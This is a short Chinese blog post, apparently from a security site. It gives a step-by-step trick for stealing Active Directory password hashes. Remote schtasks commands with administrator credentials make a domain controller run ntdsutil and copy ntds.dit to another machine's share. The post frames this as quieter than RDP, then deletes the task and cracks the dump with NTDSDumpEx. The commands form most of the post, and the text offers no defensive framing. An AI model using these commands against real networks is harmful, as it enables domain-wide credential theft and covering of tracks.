导出活动目录hash小技巧

发现很多人都喜欢3389远程上去拖,其实没有必要的,动静太大,直接通过ntdsutil导出到本地机器上

先本地创建一个文件夹用来接收文件

《导出活动目录hash小技巧》

执行

schtasks  /create /tn "dump hash" /tr "cmd.exe /c ntdsutil "ac intds" "ifm" "create full \192.168.123.100c$Userswin7Desktoprecv_data123" q q" /sc once /st 03:21 /F  /u z3r0.comadministrator /p Admin888 /s WIN-KJ4FT50O09H.z3r0.com

《导出活动目录hash小技巧》

注意文件夹必须要为空

到点准时接收hash

《导出活动目录hash小技巧》

删除计划任务

schtasks  /delete /tn "dump hash" /F  /u z3r0.comadministrator /p Admin888 /s WIN-KJ4FT50O09H.z3r0.com

《导出活动目录hash小技巧》

最后跑跑hash

NTDSDumpEx.exe -d ntds.dit -s SYSTEM -o hash_result.txt

《导出活动目录hash小技巧》

原创文章,作者:鹰小编,如若转载,请注明出处:http://www.mottoin.com/tech/113401.html

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code